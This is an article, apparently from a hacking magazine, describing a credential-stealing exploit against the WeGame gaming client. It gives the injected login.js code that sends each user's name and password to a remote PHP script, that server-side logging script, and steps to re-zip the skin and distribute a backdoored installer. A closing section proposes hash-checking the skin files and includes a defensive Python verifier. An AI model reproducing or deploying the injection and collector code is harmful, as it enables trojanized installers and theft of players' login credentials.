WeGame Credential Stealing Exploit

WeGame, founded in 2007, is an application for gamers: with WeGame you can play games with other players around the world for free. WeGame is a San Francisco-based gaming company. Tagged.com, a social discovery website also based in San Francisco, acquired WeGame, so Tagged.com automatically becomes exposed to this exploit as well; Tagged.com lets its users play games online through WeGame.

On 16th June, Compl3x published an exploit on 1337day.com. According to the author, all versions are affected by this exploit.

He explained it: “WeGame uses a file called default.skn, found in the installation directory, to load skins for the WeGame client. This file is simply a renamed zip archive and contains images, HTML files and JavaScript files. These JavaScript files are not hash checked at startup, and thus code can be injected to transmit the username and password to a remote server. The code below will transmit usernames and passwords to a remote server. However, the WeGame client will execute any JavaScript contained in these files, so there is a much wider scope to what is possible.”

The exploit is carried out in two parts. The first part consists of backdooring the client.

When we look inside the default.skn file, we see:

./skin/dl-started.js
./skin/login.js
./skin/dl-confirm.js
./skin/jquery-151-min.js

We could inject our code into an HTML file as well, but here the .js file is what processes the action. The most important file for us is login.js, as everything happens in this file. login.js executes a function called doLogin() when we log in to the WeGame gaming server.

So let's see how doLogin() works:

function doLogin()
{
  var pass = '';
  // doLogin( user, pass, hashed, remember_me );

  // if we have a saved password hash and it wasn't changed, send it along
  if ( document.getElementById('real-pw').value == edit_pw_text )
    pass = hashed_pw;
  else // otherwise, send whatever the user entered
    pass = getValue( "password" );

  wegame.doLogin( getValue( "username" ), pass, hashed, getChecked( "rememberme" ) );
}

Now, to grab the values of “username” and “password”, we just have to put:

creds = (getValue( "username" ) + "|" + getValue( "password" ));

These values can then be passed to a PHP script as query-string variables:

window.open("http://example.com/wegame.php?user=" + getValue( "username" ) + "&pass=" + getValue( "password" ), "Logging into WeGame…", "location=1,status=0,scrollbars=0,width=0,height=0");

You are all set now: just insert this line into the doLogin() function and all the credentials will be sent to you.

function doLogin()
{
  var pass = '';
  // doLogin( user, pass, hashed, remember_me );

  // if we have a saved password hash and it wasn't changed, send it along
  if ( document.getElementById('real-pw').value == edit_pw_text )
    pass = hashed_pw;
  else // otherwise, send whatever the user entered
    pass = getValue( "password" );

  window.open("http://example.com/wegame.php?user=" + getValue( "username" ) + "&pass=" + getValue( "password" ), "Logging into WeGame…", "location=1,status=0,scrollbars=0,width=0,height=0");

  wegame.doLogin( getValue( "username" ), pass, hashed, getChecked( "rememberme" ) );
}

Finally, re-zip the “skin” folder, put it back into the installer and distribute it. Now comes Part 2, “Setting up the Server”:

After backdooring the client and installer, we now set up the server. For this we need a processing script (it can be written in any programming language). Here is a PHP script example:

<?php
// If you don't have the username, there is no use in having the password.
if (isset($_GET['user']))
{
  $user = $_GET['user'];
  $pass = $_GET['pass'];
  $myFile = "text.txt";
  $fh = fopen($myFile, 'a');
  $Data = ("$user|$pass");
  fwrite($fh, $Data . "\n");
  fclose($fh);

  echo("<script>window.close();</script>");
}
else
{
  echo("<script>window.close();</script>");
}
?>

It is necessary that the script closes the window it was opened in, because if the login process doesn't complete, the client times out with a “wrong user/pass” alert. So, to exfiltrate the data without breaking the login, the script echoes window.close(); this works because WeGame opens the window as a child of the client.

How can we fix this vulnerability?

To fix this, the client needs to hash-check the vital files in default.skn on startup. If these JavaScript files are hash checked at startup, any injected code that would transmit the username and password to a remote server is detected before the client executes it, and thus the exploit no longer works.
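As an added example that is not part of the original article or of WeGame's own code, here is what such a startup check looks like in Python: a vendor-side step computes a manifest of SHA-256 digests over every executable entry (.js and .html) of a trusted skin archive, and the client-side check refuses a default.skn whose entries were modified, removed or added. The archive contents, the helper names and the sample tampering are constructed for the example (the entry names are taken from the listing above); the real client is not written in Python, so this shows the logic rather than a drop-in patch.

```python
import hashlib
import hmac
import io
import zipfile

# Constructed sample skin archive standing in for default.skn (not WeGame's real file).
# The entry names mirror those listed in the article; the contents are placeholders.
SAMPLE_SKIN_FILES = {
    "skin/dl-started.js": b"// placeholder download-started script\n",
    "skin/login.js": b"function doLogin() { /* original login handler */ }\n",
    "skin/dl-confirm.js": b"// placeholder download-confirm script\n",
    "skin/jquery-151-min.js": b"/* placeholder jquery build */\n",
}

# Only these entry types are integrity-critical here: the client executes them.
CHECKED_SUFFIXES = (".js", ".html", ".htm")


def build_skin(files):
    """Pack a dict of name -> bytes into an in-memory zip archive (stand-in for default.skn)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in files.items():
            zf.writestr(name, data)
    return buf.getvalue()


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def build_manifest(skin_bytes):
    """Vendor-side step: SHA-256 of every executable entry in a trusted archive.

    The manifest must ship inside the signed client binary (or be signed itself);
    a manifest stored next to default.skn can be rewritten by whoever rewrites login.js.
    """
    manifest = {}
    with zipfile.ZipFile(io.BytesIO(skin_bytes)) as zf:
        for info in zf.infolist():
            if info.filename.endswith(CHECKED_SUFFIXES):
                manifest[info.filename] = sha256_hex(zf.read(info))
    return manifest


def verify_skin(skin_bytes, manifest):
    """Client-side startup check. Returns a sorted list of problems; empty means intact.

    Three failure classes are reported: modified entries, entries missing from the
    archive, and executable entries the manifest never listed (an extra injected script).
    """
    problems = []
    with zipfile.ZipFile(io.BytesIO(skin_bytes)) as zf:
        present = {info.filename for info in zf.infolist()}
        for name, expected in manifest.items():
            if name not in present:
                problems.append(f"missing: {name}")
                continue
            actual = sha256_hex(zf.read(name))
            # compare_digest avoids timing differences; cheap insurance for a local check
            if not hmac.compare_digest(actual, expected):
                problems.append(f"modified: {name}")
        for name in present:
            if name.endswith(CHECKED_SUFFIXES) and name not in manifest:
                problems.append(f"unexpected: {name}")
    return sorted(problems)


def tamper_with(files, name, extra):
    """Constructed tampering for the demo: append bytes to one entry, as the injection above does."""
    modified = dict(files)
    modified[name] = modified[name] + extra
    return modified


if __name__ == "__main__":
    trusted = build_skin(SAMPLE_SKIN_FILES)
    manifest = build_manifest(trusted)
    print("trusted skin problems:", verify_skin(trusted, manifest))

    backdoored = build_skin(tamper_with(SAMPLE_SKIN_FILES, "skin/login.js", b"// injected\n"))
    print("tampered skin problems:", verify_skin(backdoored, manifest))
```

The check is only as strong as the place the manifest lives: embed it in the signed client binary or sign it separately, because a manifest stored beside default.skn is rewritten as easily as login.js. Limiting the check to .js and .html entries keeps it focused on what the client executes; hashing every entry is the simpler and safer default if the skin rarely changes.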

Author: Naveen Singh

Source: Originally Published in Hacker5 Magazine July Issue


Naveen Thakur

A Wandering Geek Soul.
